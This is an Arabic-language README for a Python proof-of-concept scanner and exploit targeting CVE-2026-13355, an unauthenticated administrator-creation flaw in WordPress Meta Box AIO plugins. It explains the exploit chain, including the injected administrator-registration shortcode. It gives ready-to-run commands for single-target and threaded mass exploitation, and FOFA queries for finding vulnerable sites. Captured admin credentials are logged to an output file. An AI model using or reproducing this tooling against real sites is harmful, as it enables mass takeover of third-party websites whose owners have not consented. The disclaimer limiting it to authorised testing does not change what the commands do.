
ماسح PoC واستغلال بلغة Python لـ CVE-2026-13355، وهو تصعيد صلاحيات إداري غير مُصادق عليه في إضافات Meta Box AIO لـ WordPress، مع فحص جماعي عبر FOFA.
أداة فحص واستغلال بلغة Python 3 لإثبات المفهوم لـ CVE-2026-13355 في حزمة WordPress Meta Box AIO (وإضافات MB Frontend Submission / MB User Profile ذات الصلة).
| المنصة | إضافة WordPress |
| المكوّن | Meta Box AIO |
| المتأثر | Meta Box AIO ≤ 3.11.0؛ MB Frontend Submission ≤ 4.5.6؛ MB User Profile ≤ 3.11.0 |
| تم الإصلاح في | Meta Box AIO 3.12.0+ (تفويض Form::process()) |
| CVSS | 9.8 حرج |
| المصادقة | غير مُصادَق عليه |
| CWE | CWE-269 — إدارة صلاحيات غير سليمة |
| الباحث | h0xilo (Wordfence) |
تسمح عيوب متسلسلة في إضافتين مضمّنتين بإنشاء حساب مسؤول دون مصادقة:
mbfs) — يقوم rwmb_frontend_field_object_id بتجاوز هدف النموذج دون تفويض؛ ويُهمل Form::process() الدالة user_can_edit()، مما يمكّن المهاجمين من استدعاء wp_update_post() والكتابة فوق post_content في أي منشور/صفحة.mbup) — يتم الوثوق بسمات الاختصار المُحقَنة [mb_user_profile_register role="administrator" auto_login="true"] دون التحقق من الدور.مهم: تتطلب سلسلة الاستغلال وجود نموذج mbfs (إرسال من الواجهة الأمامية) عام، وليس نماذج mbup الخاصة بتسجيل الدخول فقط. العديد من نتائج FOFA تكشف فقط واجهة تسجيل الدخول/التسجيل mbup — ويتم تصنيفها كـ plugin_mbup_only، وغير قابلة للاستغلال عبر هذه السلسلة.
pip install -r requirements.txtpip install -r requirements.txt
# هدف واحد — فحص (تدفق الطرفية المباشر افتراضيًا)
python poc.py -u https://target.example --mode check
# فحص جماعي (سطر واحد لكل هدف ما لم يُستخدم --quiet)
python poc.py --list targets.example.txt --mode check --threads 20
# هدف واحد — استغلال (يحتاج رابط نموذج mbfs + معرّف المنشور)
python poc.py -u https://target.example --mode exploit \
--form-url /contact/ --object-id 12 --verify
# استغلال جماعي من مخرجات الفحص
python poc.py --list candidates.jsonl --mode exploit --threads 5 --verify
مثال على الاستعلام:
body="/wp-content/plugins/meta-box-aio/"
تطبيع تصدير FOFA بصيغة CSV:
python fofa_to_list.py -i fofa_export.csv
# يكتب list.txt + CSV مُطبَّع (محلي فقط، مُتجاهَل في git)
python poc.py --list list.txt --mode check --threads 20
استخدم --vuln-list exploited.txt في تشغيلات الاستغلال حتى لا يتم الكتابة فوق نتائج الفحص في hits.txt.
status في الفحصpost_content عبر نموذج mbfs مع ?rwmb_frontend_field_object_id=<id>.mbfs الخاصة بالاتصال/النشرة البريدية إلى حقل post_content حقيقي؛ قد تفشل الكتابة فوقه عمليًا..
├── poc.py
├── fofa_to_list.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore
قوائم الفحص المحلية ومخرجات التشغيل (list.txt، fofa*.csv، *.jsonl، hits*.txt، …) موجودة في .gitignore ولا ينبغي إيداعها.
لأغراض الاختبار الأمني المُصرَّح به والتعليم فقط. أنت مسؤول عن الامتثال للقوانين المعمول بها وقواعد البرامج.
| الخيار | الوصف |
|---|
-u, --url | عنوان URL أساسي واحد |
--list | قائمة عناوين URL، أو CSV مُطبَّع من FOFA (عمود url)، أو candidates.jsonl |
--mode | check أو exploit |
--form-url | صفحة تحتوي على [mb_frontend_form ...] / mbfs-form |
--object-id | معرّف المنشور/الصفحة لـ rwmb_frontend_field_object_id |
--paths | مسارات إضافية للزحف بحثًا عن نماذج الواجهة الأمامية |
--username, --email, --password | بيانات اعتماد التسجيل (استغلال) |
--shortcode | حمولة post_content المُحقَنة (افتراضيًا اختصار تسجيل المسؤول) |
--verify | التأكيد عبر /wp-admin/ أو wp-login.php بعد التسجيل |
--flow | بث سطر واحد لكل هدف في التشغيلات الجماعية (افتراضي مع --list) |
--no-flow | ملخص التقدم فقط |
--quiet, -q | مخرجات طرفية مختصرة |
--threads, -j | التزامن الجماعي (افتراضي 15) |
--output | سجل JSONL (افتراضي cve_2026_13355_results.jsonl) |
--vuln-list | أسطر النتائج النصية / المُستغَلَّة (افتراضي hits.txt / استخدم exploited.txt للاستغلال) |
--candidates-list | بيانات JSONL الوصفية للفحص (افتراضي candidates.jsonl) |
| الملف | الوضع | المحتوى |
|---|
cve_2026_13355_results.jsonl | كلاهما | JSON كامل لكل هدف |
hits.txt | check | عناوين URL التي تحتوي على candidate_mbfs |
candidates.jsonl | check | form_url، object_id، تلميحات الإصدار |
exploited.txt | exploit | url|user|email|pass|oid=… |
| الحالة | المعنى |
|---|
candidate_mbfs | الإضافة موجودة + تم العثور على نموذج MB Frontend Submission (قد يكون الاستغلال ممكنًا) |
plugin_mbup_only | فقط نماذج تسجيل الدخول/التسجيل الخاصة بـ User Profile — ليست سلسلة CVE هذه |
plugin_no_frontend_forms | بصمة الإضافة موجودة، لم يتم اكتشاف نماذج rwmb للواجهة الأمامية |
patched | الإصدار أعلى من النطاق المتأثر (عند إمكانية القراءة) |
no_plugin | لم يتم اكتشاف Meta Box AIO / الإضافات |